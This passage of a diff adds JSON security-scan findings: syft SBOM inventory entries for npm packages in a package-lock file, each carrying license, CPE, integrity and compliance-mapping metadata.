}, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8491d2589d2b26fe", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: dayjs 1.11.20", + "title": "dayjs 1.11.20", + "description": "Package discovered: dayjs 1.11.20", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "11ebb955a4940d8a", + "name": "dayjs", + "version": "1.11.20", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:dayjs:dayjs:1.11.20:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/dayjs@1.11.20", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/dayjs/-/dayjs-1.11.20.tgz", + "integrity": "sha512-YbwwqR/uYpeoP4pu043q+LTDLFBLApUP6VxRihdfNTqu4ubqMlGDLd6ErXhEgsyvY0K6nCs7nggYumAN+9uEuQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3e4836eb16baaf2c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: debug 2.6.9", + "title": "debug 2.6.9", + "description": "Package discovered: debug 2.6.9", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "791d0c8d38a3b042", + "name": "debug", + "version": "2.6.9", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:debug_project:debug:2.6.9:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/debug@2.6.9", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c3870af17f8e7246", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: debug 4.4.3", + "title": "debug 4.4.3", + "description": "Package discovered: debug 4.4.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "96b0606cb5228062", + "name": "debug", + "version": "4.4.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:debug_project:debug:4.4.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/debug@4.4.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", + "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", + "dependencies": { + "ms": "^2.1.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6cb9876ddd023a8b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: decamelize 1.2.0", + "title": "decamelize 1.2.0", + "description": "Package discovered: decamelize 1.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "56044f762e36d59b", + "name": "decamelize", + "version": "1.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:decamelize:decamelize:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/decamelize@1.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/decamelize/-/decamelize-1.2.0.tgz", + "integrity": "sha512-z2S+W9X73hAUUki+N+9Za2lBlun89zigOyGrsax+KUQ6wKW4ZoWpEYBkGhQjwAjjDCkWxhY0VKEhk8wzY7F5cA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2d9026954da43a27", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: decimal.js-light 2.5.1", + "title": "decimal.js-light 2.5.1", + "description": "Package discovered: decimal.js-light 2.5.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6135efdaaf1822bb", + "name": "decimal.js-light", + "version": "2.5.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:decimal.js-light:decimal.js-light:2.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:decimal.js-light:decimal.js_light:2.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:decimal.js_light:decimal.js-light:2.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:decimal.js_light:decimal.js_light:2.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:decimal.js:decimal.js-light:2.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:decimal.js:decimal.js_light:2.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/decimal.js-light@2.5.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/decimal.js-light/-/decimal.js-light-2.5.1.tgz", + "integrity": "sha512-qIMFpTMZmny+MMIitAB6D7iVPEorVw6YQRWkvarTkT4tBeSLLiHzcwj6q0MmYSFCiVpiqPJTJEYIrpcPzVEIvg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8e421fc3fe27aa9c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: deepmerge 4.3.1", + "title": "deepmerge 4.3.1", + "description": "Package discovered: deepmerge 4.3.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6fcde9d497e83e33", + "name": "deepmerge", + "version": "4.3.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:deepmerge:deepmerge:4.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/deepmerge@4.3.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", + "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "bd6d6c864c2f97b9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: delayed-stream 1.0.0", + "title": "delayed-stream 1.0.0", + "description": "Package discovered: delayed-stream 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c23340a58ec36159", + "name": "delayed-stream", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:delayed-stream:delayed-stream:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:delayed-stream:delayed_stream:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:delayed_stream:delayed-stream:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:delayed_stream:delayed_stream:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:delayed:delayed-stream:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:delayed:delayed_stream:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/delayed-stream@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b4af690e8812705b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: denque 2.1.0", + "title": "denque 2.1.0", + "description": "Package discovered: denque 2.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b292c74570fb7df3", + "name": "denque", + "version": "2.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:denque:denque:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/denque@2.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/denque/-/denque-2.1.0.tgz", + "integrity": "sha512-HVQE3AAb/pxF8fQAoiqpvg9i3evqug3hoiwakOyZAwJm+6vZehbkYXZ0l4JxS+I3QxM97v5aaRNhj8v5oBhekw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "86dec3bfd9bed666", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: depd 2.0.0", + "title": "depd 2.0.0", + "description": "Package discovered: depd 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "82a407fce3facea3", + "name": "depd", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:depd:depd:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/depd@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + 